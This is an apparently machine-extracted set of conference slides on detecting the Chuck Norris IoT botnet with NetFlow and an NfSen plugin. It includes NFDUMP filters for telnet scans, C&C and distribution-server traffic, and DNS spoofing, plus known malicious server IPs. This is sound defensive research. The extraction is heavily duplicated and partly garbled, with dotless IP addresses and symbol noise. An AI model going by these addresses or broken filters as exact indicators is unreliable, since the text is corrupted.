Part IV
NfSen Botnet Detection Plugin
Botnet Detection Plugin

Plugin Features
Detects Chuck Norris-like botnet behavior
Based on NetFlow and other network data sources
Processes data regularly and provides real-time output

Plugin Architecture
Compliant with the NfSen plugin architecture recommendations
PHP frontend with a Perl backend and a PostgreSQL DB
Web, e-mail and syslog detection output and reporting
Plugin Architecture

(Figure: BACKEND – cndet.pm with cndetdb.pm, which reads NetFlow data, DNS and the WHOIS db and stores results in PostgreSQL; FRONTEND – cndet.php; backend and frontend communicate through the nfsend comm interface.)
Plugin Methods Architecture

(Figure: cndetdb.pm draws on PostgreSQL, NetFlow data, DNS and the WHOIS db and runs the detection methods:)
Telnet scan detection
Botnet distribution sites detection
Botnet C&C centers detection
DNS spoofing attack detection
ADSL string detection
Web Interface – Infected Host Detected
Part V
Conclusion
Detection Plugin and Other Botnets

Botnet Lifecycle Similar for the Majority of Botnets
scanning for possible bots
infection of a vulnerable device
bot initialization/update
botnet operation

Botnet Detection Plugin Customization
modular plugin engine
easy modification for detection of other botnets
the detection methods need to be customized
plugin distributed under the BSD license
Conclusion

Network Devices Are Not Protected
Routers, access points, printers, cameras, TVs, ...
No AV software, missing patches and firmware updates
But they should be protected

Experience
NetFlow can monitor all such devices in the network
Discovery of the new Chuck Norris botnet using NetFlow
Developed a specialized NfSen plugin for Chuck Norris botnet detection

Future
Chuck Norris is down but others are coming (e.g. Stuxnet)
We are open to research collaboration
The detection plugin is available at our project site
Thank You For Your Attention

Vojtěch Krmíček, Tomáš Plesník
{vojtec|plesnik}@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber

Detecting Botnets with NetFlow

This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch Krmíček, Tomáš Plesník
vojtec|plesnik@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber
Detecting Botnets with NetFlow
This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801.
Krmíček, Plesník  Detecting Botnets with NetFlow  28 / 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
